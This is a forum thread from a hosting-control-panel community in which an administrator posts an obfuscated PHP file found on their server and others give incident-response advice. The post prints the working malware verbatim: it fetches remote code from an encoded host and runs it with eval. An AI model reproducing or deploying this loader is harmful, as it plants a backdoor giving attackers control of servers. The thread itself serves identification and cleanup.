The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

What does this commands?

Discussion in 'Security' started by hostmasti, Nov 2, 2011.

  1. hostmasti

    hostmasti Registered

    Joined:
    Feb 24, 2009
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Please let us know what exactly this commands execute for? as we have found this unknown file uploaded in server.

    Code:
    <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwZmVlZC5ydQ==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="20742f95bc39e28618c5dbedc1aaf0e6") $f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
     
  2. morissette

    morissette Well-Known Member

    Joined:
    May 24, 2009
    Messages:
    119
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Austin, TX
    cPanel Access Level:
    Root Administrator
    That is malicious and used to upload files via POST requests. Please contact your host's security/abuse department for investigation.

    OR

    Follow these steps:

    1. stat the file: `stat /home/user/public_html/somefile.php`
    2. save time stamp
    3. based off mtime and ctime review domlogs, messages and cpanel logs

    The above will typically tell you how the file was introduced to the account
     
  3. storminternet

    storminternet Well-Known Member

    Joined:
    Nov 2, 2011
    Messages:
    462
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Hello,

    You can further scan the offended account with clamscan or maldet if you are having root privileges or you can also
    ask your host to do so.
     
  4. hostmasti

    hostmasti Registered

    Joined:
    Feb 24, 2009
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    I have manually deleted the file but now how can i go through the above steps?
     
  5. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    You cannot do those steps when you've removed the file. In the future, you should try to obtain as much information about the file for reviewing logs and processes before removing the file.
     
Loading...

Share This Page